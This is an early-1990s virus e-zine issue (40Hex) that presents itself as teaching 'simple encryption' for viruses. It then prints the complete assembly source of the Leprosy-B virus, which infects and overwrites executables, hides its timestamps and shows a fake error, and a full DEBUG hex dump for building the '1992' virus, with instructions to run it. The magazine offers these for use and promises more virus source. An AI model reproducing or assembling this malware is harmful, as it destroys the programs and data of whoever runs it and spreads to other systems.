~cpp //40HEX-1.004
40H Vmag Issue 1 Volume 1 00004
- SIMPLE ENCRYPTION METHODS -
Encryption is perhaps one of the key parts of writing a virus. If you
have a virus that prints a message to the screen, you don't want infected
files to contain that message.
One easy way to encrypt data is the XOR method. XOR is a matamatical
function that can be used to cifer and decifer data with the same key.
Example --
FF xor A1 = 5E
byte to encrypt^ ^key ^result
and likewise
5E xor A1 = FF
So as you can see an easy way to encrypt/decrypt sensitve data is with the
XOR function.
A popular virus that demonstrates this teqnique is Leprosy-B. By studing the
below example you are on the way to make simple encrypted viruses.
------------------------------------------------------------------------------
; <LEPROSYB.ASM> - Leprosy-B Virus Source
; Copy-ya-right (c) 1990 by PCM2.
;
; This file is the source code to the Leprosy-B virus. It should
; be assembled with an MASM-compatible assembler; it has been tested
; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0.
; It should be made into a .COM file before executing, with either
; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility.
;
; This program has the potential to permanently destroy executable
; images on any disk medium. Other modifications may have been made
; subsequent to the original release by the author, either benign,
; or which could result in further harm should this program be run.
; In any case, the author assumes no responsibility for any damage
; caused by this program, incidental or otherwise. As a precaution,
; this program should not be turned over to irresponsible hands...
; (unlike people like us, that is).
title "Leprosy-B Virus by PCM2, August 1990"
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 666 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted with$"
virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought by$"
virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$"
virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,6 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main
------------------------------------------------------------------------------
While the virus is no great wonder the simple encryption method is what is
used by almost all viruses.
~cpp //40HEX-1.005
40H Vmag Issue 1 Volume 1 00005
- 1992 VIRUS -
Heres another for you virus fiends. Its been labled 1992, the latest in the
line of viruses brought to you by SKISM.
While the virus is no groundbreaker - the graphic display that is given by
the virus will go down in history as the first of it's kind.
Copy the below to a file called 1992.USR then execute --
DEBUG < 1992.USR
------------------------------------------------------------------------------
n 1992.com
e 0100 EB 02 90 02 E8 03 00 E9 E7 05 51 BB 38 01 8A 2F
e 0110 32 2E 03 01 88 2F 43 81 FB 00 09 7E F1 59 C3 BA
e 0120 00 01 8B 1E E5 06 53 E8 E0 FF 5B B9 C8 07 B4 40
e 0130 CD 21 53 E8 D4 FF 5B C3 0D 10 1B 00 08 B1 1B 04
e 0140 C1 18 22 C6 BD 1B 01 B1 1B 15 B1 1B 01 1A 1B 00
e 0150 C1 18 04 C6 DB 02 B3 B3 14 18 19 B3 10 DF 22 22
e 0160 08 B1 1B 01 C1 18 0C C6 C0 18 05 C6 C3 C6 BD 22
e 0170 22 1A 1B 00 B1 1B 06 02 B3 B3 14 18 1D B3 10 DF
e 0180 22 08 C2 C6 C6 C0 C6 DB 1B 0C B1 1B 0B B1 22 22
e 0190 1A 1B 00 B1 1B 01 02 B3 B3 14 18 23 B3 10 DF 1B
e 01A0 00 08 B1 1B 12 B1 1B 0B C2 C6 C6 1A 1B 00 B1 1B
e 01B0 00 02 B3 B3 14 18 21 B3 10 DF 22 13 1B 06 0B DC
e 01C0 10 22 13 22 DC 10 22 13 22 DC 10 22 13 22 DC 10
e 01D0 22 13 1B 06 DC 10 22 13 22 22 DC 10 22 22 13 22
e 01E0 22 DC 10 22 22 1A 1B 00 08 B1 22 22 02 B3 B3 14
e 01F0 18 0A B3 0D 18 1A B3 02 10 DF 14 B3 B3 B3 10 DF
e 0200 13 22 0B DC 02 10 18 06 B3 13 22 0B DC 22 DC 02
e 0210 10 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10
e 0220 18 06 B3 13 22 0B DC 22 DC 22 DC 22 DC 02 10 B3
e 0230 22 1A 1B 00 08 B1 22 22 02 B3 B3 14 18 05 B3 0D
e 0240 18 1B B3 02 10 DF 22 22 14 B3 10 DF 13 1B 06 0B
e 0250 DC 10 22 13 22 22 DC 02 10 B3 22 22 13 22 0B DC
e 0260 02 10 B3 13 1B 06 0B DC 10 22 13 22 DC 02 10 B3
e 0270 13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3 22 1A
e 0280 08 C6 C6 C0 DB 22 22 02 B3 B3 14 18 05 B3 0D 18
e 0290 0E B3 12 1B 05 14 18 01 B3 02 10 DF 1B 00 08 B1
e 02A0 22 22 02 B3 B3 B3 13 22 0B DC 02 10 B3 13 22 0B
e 02B0 DC 22 DC 02 10 B3 22 13 22 0B DC 02 10 B3 22 B3
e 02C0 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3
e 02D0 22 B3 B3 13 22 0B DC 02 10 B3 22 1A 22 22 08 B1
e 02E0 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC D9
e 02F0 D9 02 14 B3 B3 B0 B0 0D 12 D9 14 B3 B3 B3 02 10
e 0300 DF 1B 01 08 B1 22 13 1B 06 0B DC 02 10 B3 13 22
e 0310 0B DC 02 10 B3 13 22 0B DC 02 10 B3 13 22 0B DC
e 0320 02 10 B3 13 1B 06 0B DC 02 10 B3 13 22 0B DC 02
e 0330 10 B3 1B 00 13 22 0B DC 02 10 B3 22 1A 22 22 08
e 0340 B1 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC
e 0350 D9 D9 02 14 B3 B3 B3 B0 0D 12 D9 14 B3 B3 02 10
e 0360 DF 1B 06 08 B1 22 22 02 18 07 B3 22 B3 B3 22 B3
e 0370 B3 22 B3 B3 22 18 07 B3 22 B3 B3 1B 00 B3 B3 B3
e 0380 22 1A 22 22 08 B1 1B 00 02 B3 B3 14 18 01 B3 0D
e 0390 B3 B3 B3 02 B3 0D 18 0E B3 12 DC 18 07 D9 14 B3
e 03A0 B3 02 10 DF 1B 01 08 D8 C6 DB 1B 18 D8 C6 C6 C6
e 03B0 BD 22 22 1A 22 22 B1 1B 01 02 B3 B3 14 B3 B3 B3
e 03C0 0D 18 18 B3 02 10 DF 1B 00 08 C1 18 04 C6 C0 18
e 03D0 16 C6 DB 1B 00 B1 22 22 1A 22 22 C1 18 01 C6 BD
e 03E0 02 B3 B3 0D 14 18 1F B3 02 10 DF 22 22 08 B1 1B
e 03F0 07 16 22 0D 14 56 16 6A 67 22 6F 63 6C 22 75 6A
e 0400 6D 22 60 70 6D 77 65 6A 76 22 7B 6D 77 22 10 22
e 0410 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D
e 0420 14 18 1E B3 02 10 DF 1B 00 08 B1 1B 01 02 B3 B3
e 0430 16 22 0D 34 30 30 2E 22 51 69 6B 71 6F 22 4D 6C
e 0440 67 2E 22 41 63 72 76 6B 63 6C 22 10 22 22 08 B1
e 0450 22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D 14 18 10
e 0460 B3 02 10 DF 0D 14 18 05 B3 02 10 DF 1B 01 08 B1
e 0470 1B 01 02 B3 B3 16 22 0D 56 70 6B 72 71 2E 22 63
e 0480 6C 66 22 51 77 60 2F 58 67 70 6D 22 6C 6D 75 22
e 0490 10 22 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3
e 04A0 B3 0D 14 18 10 B3 02 10 DF 1B 01 08 B1 1B 05 B1
e 04B0 1B 01 02 B3 B3 16 22 0D 71 6A 63 6C 69 71 22 7B
e 04C0 6D 77 22 63 65 63 6B 6C 2E 22 22 75 6B 76 6A 22
e 04D0 10 22 22 08 C2 C6 C6 1A 22 22 B1 1B 01 B1 02 B3
e 04E0 B3 0D 14 18 10 B3 02 10 DF 1B 01 08 C2 C6 C6 BD
e 04F0 1B 06 C1 C6 BD 22 22 02 B3 B3 16 22 0D 6A 6B 71
e 0500 22 6E 63 76 67 71 76 2C 2C 2C 1B 08 10 1B 06 1A
e 0510 22 22 08 C2 C6 C6 C0 C6 C3 02 B3 B3 0D 14 18 11
e 0520 B3 02 10 DF 1B 07 08 B1 1B 06 B1 22 B1 22 22 02
e 0530 18 1A B3 1B 04 1A 1B 06 08 B1 22 22 02 B3 B3 0D
e 0540 14 18 15 B3 02 10 DF 22 22 08 B1 1B 06 B1 22 C2
e 0550 18 1E C6 BD 1B 01 1A C6 C6 C0 C6 C6 DB 22 22 02
e 0560 B3 B3 0D 14 18 14 B3 02 10 DF 1B 00 08 C1 C6 C6
e 0570 C6 C0 C6 DB 1B 07 17 22 0C 51 69 6B 71 6F 22 33
e 0580 3B 3B 30 22 2F 22 54 6B 70 77 71 18 01 23 22 10
e 0590 22 08 C1 18 01 C6 1A 22 22 B1 1B 06 02 B3 B3 0D
e 05A0 14 18 0A B3 02 10 DF 1B 0A 08 D8 18 04 C6 DB 1B
e 05B0 00 B1 1B 07 02 B3 B3 17 1B 01 0D 45 67 76 22 63
e 05C0 22 6E 63 76 67 22 72 63 71 71 23 1B 01 10 22 08
e 05D0 B1 1B 01 1A D8 C6 DB 1B 00 02 B3 B3 0D 11 18 09
e 05E0 D9 14 D9 D9 12 DF 10 1B 07 08 B1 1B 08 B1 1B 07
e 05F0 02 18 1A B3 22 22 08 B1 1B 01 1A B1 22 02 B3 B3
e 0600 0D 11 18 19 D9 02 10 DF 1B 05 08 B1 1B 11 D8 18
e 0610 09 C6 DB 1B 01 1A 02 B3 B3 0D 12 18 22 D9 DF 10
e 0620 1B 06 08 B1 1B 11 B1 1B 12 1A 0D 12 18 21 D9 DF
e 0630 10 1B 01 08 C2 18 11 C6 DB 1B 12 1A 28 02 28 2C
e 0640 47 5A 47 02 5E 02 01 3D 3D 3D 3D 3D 3D 3D 3D 22
e 0650 22 22 11 01 02 02 02 28 D3 EF 48 13 68 7B D4 14
e 0660 02 02 02 02 46 4D 51 02 22 22 22 22 02 02 02 02
e 0670 02 01 3D 3D 3D 3D 3D 3D 3D 3D 47 5A 47 05 07 02
e 0680 23 02 28 D3 EF 48 22 2A 00 23 02 00 02 02 02 56
e 0690 43 50 45 47 50 2C 47 5A 47 02 02 02 95 32 44 04
e 06A0 73 04 95 32 02 56 47 4F 52 02 02 02 02 02 02 02
e 06B0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06C0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06D0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06E0 02 02 02 02 02 07 02 2A 00 23 02 22 02 CF 22 02
e 06F0 02 BA 02 32 CF 23 3E 01 70 29 B6 2E CF 23 8A 14
e 0700 01 03 B6 28 CF 23 82 F8 1B 7E 06 3E 07 76 01 E9
e 0710 77 92 BC 3A 03 BA 02 BA 8C C2 BD 02 02 BB 06 07
e 0720 EA 07 02 E9 FC EB 88 02 E1 59 89 D5 31 C2 FE AE
e 0730 3E 22 70 07 A9 E0 FA E9 4E 3E 12 71 05 82 E6 F2
e 0740 08 E2 E9 F3 3E 1A 76 11 71 1B 2E 12 00 C2 00 C2
e 0750 00 C2 00 C2 82 E6 8D 08 E2 E9 D8 83 C0 A2 02 89
e 0760 F8 E9 D0 3E 19 70 05 77 CE 82 F6 82 E9 C5 3E 1B
e 0770 89 DB AE 88 CA B2 22 76 00 AE 49 30 EF 43 F1 A9
e 0780 89 C9 4B E2 A8 C1 B8 44 04 B6 18 CF 23 B6 1B CF
e 0790 23 88 D2 FC C0 B6 45 BC A7 04 CF 23 B8 46 04 B6
e 07A0 39 CF 23 BB 11 02 B8 3E 04 B6 4C CF 23 3F 10 02
e 07B0 77 01 E9 53 92 B6 4D CF 23 3F 10 02 76 45 B8 66
e 07C0 04 B6 39 CF 23 B6 2D CF 23 8E 04 9E 04 8B 1C 9C
e 07D0 04 B8 73 04 B6 18 CF 23 BB 05 02 B8 3C 04 B6 4C
e 07E0 CF 23 3F 10 02 77 23 B6 4D CF 23 3F 10 02 77 1A
e 07F0 B8 46 04 B6 39 CF 23 B6 18 8C 1C 9E 04 89 14 9C
e 0800 04 CF 23 E9 B2 E9 7B 92 B6 2D CF 23 8E 04 A0 04
e 0810 8B 1C A2 04 B8 8D 04 B9 73 04 89 45 1A A1 EB 04
e 0820 89 45 14 A1 E5 04 89 45 17 BA 02 41 CF 23 8B 0C
e 0830 E9 04 BA 03 41 31 CB CF 23 BA 02 3F CF 23 70 21
e 0840 A1 E7 04 B6 3D 89 1C E7 04 BB 00 02 B8 EF 04 CF
e 0850 23 B6 3C 89 1C E7 04 CF 23 89 1C EF 04 83 F9 E9
e 0860 00 77 0D B6 18 8C 1C A0 04 89 14 A2 04 CF 23 EB
e 0870 77 FD B8 8D 04 BA 00 3F CF 23 A1 E7 04 EA 9D FA
e 0880 BA 03 55 89 1C E7 04 89 0C E5 04 89 14 EB 04 CF
e 0890 23 BA 03 41 89 0C E9 04 B8 8D 04 CF 23 B6 39 B8
e 08A0 46 04 CF 23 B6 39 B8 A7 04 CF 23 BA 02 4E CF 23
e 08B0 4F 61 43 64 67 67 22 75 70 6D 76 67 22 55 6A 63
e 08C0 6E 67 23 23 23 23 23 23 1A 1A 1A 1A 1A 1A 1A 1A
rcx
7C8
w
q
------------------------------------------------------------------------------
The virus only infects systems running DOS 3.0 and up. It is non-resident
will only infect disks with more than two directorys. When the virus is
run it will seek out the first EXE file in the second directory from the
root. Each run after that will begin infection of files following. The
virus will jump from directory to directory when executed until it finds
an uninfected EXE file to nail.
On the last Friday of the month the virus will display a full color, full
screen message to all.
~cpp //40HEX-1.006
40H Vmag Issue 1 Volume 1 00006
I think this magazine will be monthly, keep looking for it.
Next Issue -
Spotlight on Vienna
Editoral on virus speed
Article on Whale and if I can find it Whale source code.
plus
More viruses, more source code and more insight...